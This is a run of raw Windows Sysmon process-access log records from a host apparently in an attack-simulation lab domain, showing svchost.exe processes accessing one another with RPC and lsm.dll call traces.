13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.664{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.586{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.586{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.555{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 